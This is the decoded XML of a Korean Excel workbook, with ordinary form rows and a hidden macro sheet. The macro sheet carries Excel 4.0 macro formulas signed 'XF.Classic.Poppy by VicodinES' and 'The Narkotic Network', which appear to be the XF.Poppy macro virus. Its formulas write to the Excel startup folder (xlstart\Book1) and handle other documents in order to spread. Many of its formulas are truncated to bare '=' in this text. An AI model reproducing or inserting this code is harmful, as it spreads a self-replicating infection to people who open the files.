      <c r="E25" s="112" t="s">
        <v>178</v>
      </c>
      <c r="F25" s="8" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="26" spans="1:5" ht="27" customHeight="1" thickBot="1">
      <c r="A26" s="17">
        <v>13</v>
      </c>
      <c r="B26" s="30" t="s">
        <v>44</v>
      </c>
      <c r="C26" s="184" t="s">
        <v>29</v>
      </c>
      <c r="D26" s="184"/>
      <c r="E26" s="185"/>
    </row>
    <row r="27" spans="1:5" ht="24" customHeight="1">
      <c r="A27" s="189" t="s">
        <v>189</v>
      </c>
      <c r="B27" s="189"/>
      <c r="C27" s="189"/>
      <c r="D27" s="189"/>
      <c r="E27" s="189"/>
    </row>
    <row r="28" spans="1:5" ht="24" customHeight="1">
      <c r="A28" s="22"/>
      <c r="B28" s="188" t="s">
        <v>188</v>
      </c>
      <c r="C28" s="188"/>
      <c r="D28" s="188"/>
      <c r="E28" s="188"/>
    </row>
    <row r="29" spans="1:5" ht="30" customHeight="1">
      <c r="A29" s="20"/>
      <c r="B29" s="3"/>
      <c r="C29" s="141"/>
      <c r="D29" s="141"/>
      <c r="E29" s="141"/>
    </row>
    <row r="30" spans="1:5" ht="30" customHeight="1">
      <c r="A30" s="20"/>
      <c r="B30" s="3"/>
      <c r="C30" s="141"/>
      <c r="D30" s="141"/>
      <c r="E30" s="141"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="14">
    <mergeCell ref="A14:A17"/>
    <mergeCell ref="B14:B17"/>
    <mergeCell ref="C5:E5"/>
    <mergeCell ref="A7:A9"/>
    <mergeCell ref="B7:B9"/>
    <mergeCell ref="A10:A13"/>
    <mergeCell ref="B10:B13"/>
    <mergeCell ref="C26:E26"/>
    <mergeCell ref="C29:E29"/>
    <mergeCell ref="C30:E30"/>
    <mergeCell ref="A24:A25"/>
    <mergeCell ref="B28:E28"/>
    <mergeCell ref="A27:E27"/>
    <mergeCell ref="B24:B25"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.39" right="0.22" top="0.7874015748031497" bottom="0.8267716535433072" header="0.3937007874015748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21484375" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="23.4453125" style="35" customWidth="1"/>
    <col min="2" max="2" width="0.9921875" style="35" customWidth="1"/>
    <col min="3" max="3" width="25.21484375" style="35" customWidth="1"/>
    <col min="4" max="16384" width="7.21484375" style="35" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="34" t="s">
        <v>108</v>
      </c>
      <c r="C1" s="35" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="34" t="s">
        <v>109</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="36" t="s">
        <v>110</v>
      </c>
      <c r="C3" s="37" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="36" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="38" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="38" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="38" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="39" t="s">
        <v>112</v>
      </c>
      <c r="C7" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="40" t="s">
        <v>113</v>
      </c>
      <c r="C8" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="41" t="s">
        <v>114</v>
      </c>
      <c r="C9" s="38" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="40" t="s">
        <v>115</v>
      </c>
      <c r="C10" s="38" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="42" t="s">
        <v>116</v>
      </c>
      <c r="C11" s="38" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="38" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="38" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="37" t="s">
        <v>117</v>
      </c>
      <c r="C14" s="43" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="38" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="38" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="43" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C17" s="37" t="s">
        <v>118</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="38" t="e">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="38" t="e">
        <f>"Document_array",</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C20" s="38" t="e">
        <f>$A$1INDEX(,2)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="45" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#NAME?</v>
      </c>
      <c r="C21" s="38" t="e">
        <f>$A$2INDEX(,1)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="38" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
      <c r="C22" s="38" t="e">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="38" t="b">
        <f>IF(A21=0)</f>
        <v>0</v>
      </c>
      <c r="C23" s="43" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="38" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="46" t="s">
        <v>120</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="38" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="38" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="38" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="38" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="38" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="38" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="38" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="38" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="38" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="38" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="38" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="38" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="38" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="38" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="43" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="38" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="45" t="e">
        <f>"XF.Classic.Poppy"</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="38" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="38" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="43" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C41" s="43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정사무엘</cp:lastModifiedBy>
  <cp:lastPrinted>2014-09-29T01:30:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2004-04-16T00:11:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-09-29T13:26:29Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>